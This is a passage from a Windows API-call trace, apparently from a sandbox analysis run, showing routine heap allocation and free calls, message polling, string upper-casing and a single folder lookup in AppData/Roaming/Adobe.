Flags=0x0, Size=0x10) returned 0x2aa9058 [0113.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0113.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72268 [0113.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0113.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0113.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0113.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9178 [0113.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0113.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0113.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0113.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0113.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0113.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0113.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0113.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0113.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0113.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0113.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0113.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0113.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0113.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0113.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0113.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0113.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0113.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0113.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0113.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0113.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0113.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0113.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0113.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0113.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0113.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0113.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0113.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0113.627] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0113.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0113.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0113.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0113.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0113.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0113.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0113.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0113.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0113.628] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0113.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0113.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0113.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0113.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0113.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0113.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0113.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0113.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0113.628] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0113.628] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0113.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0113.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0113.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0113.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0113.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0113.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72378 [0113.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0113.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0113.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0113.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0113.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0113.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0113.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0113.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0113.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0113.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0113.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0113.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0113.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0113.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72318 [0113.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0113.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0113.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0113.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0113.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0113.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0113.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0113.629] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0113.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0113.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0113.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0113.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0113.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0113.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0113.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0113.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0113.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0113.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0113.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0113.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0113.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0113.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0113.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0113.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0113.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa030 [0113.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0113.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0113.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0113.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0113.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa030 | out: hHeap=0x2af0000) returned 1 [0113.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0113.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0113.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0113.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0113.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0113.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0113.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa018 [0113.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0113.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0113.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0113.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0113.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0113.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0113.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0113.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0113.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0113.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0113.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0113.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0113.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0113.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0113.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0113.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0113.631] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0113.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0113.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0113.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0113.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0113.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa198 [0113.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72358 [0113.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0113.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0113.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0113.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0113.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0113.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0113.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa048 [0113.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0113.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0113.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0113.631] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0113.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0113.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0113.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0113.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0113.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0113.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0113.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0113.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa078 [0113.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0113.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0113.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0113.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0113.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0113.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0113.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0113.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa180 [0113.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0113.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0113.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0113.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0113.632] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Adobe", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42d40cf2, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x7161656c, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x7b7983c6, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 0x9a4900 [0113.632] FindClose (in: hFindFile=0x9a4900 | out: hFindFile=0x9a4900) returned 1 [0113.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0113.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0113.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0113.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0113.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0113.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0113.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0113.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0113.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0113.633] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0113.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0113.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0113.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0113.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0113.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa018 [0113.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0113.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0113.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f40 [0113.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0113.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f40 | out: hHeap=0x2af0000) returned 1 [0113.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0113.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa180 [0113.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa078 [0113.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0113.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0113.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa090 [0113.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0113.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0113.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0113.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0113.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0113.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0113.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0113.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0113.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0113.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0113.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0113.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0113.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0113.634] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.634] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0113.634] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0113.634] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0113.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0113.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0113.634] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa0f0 [0113.634] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0113.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0113.634] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0113.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0113.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0113.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0113.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0113.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0113.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0113.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0113.634] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0113.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0113.634] PeekMessageW (in: 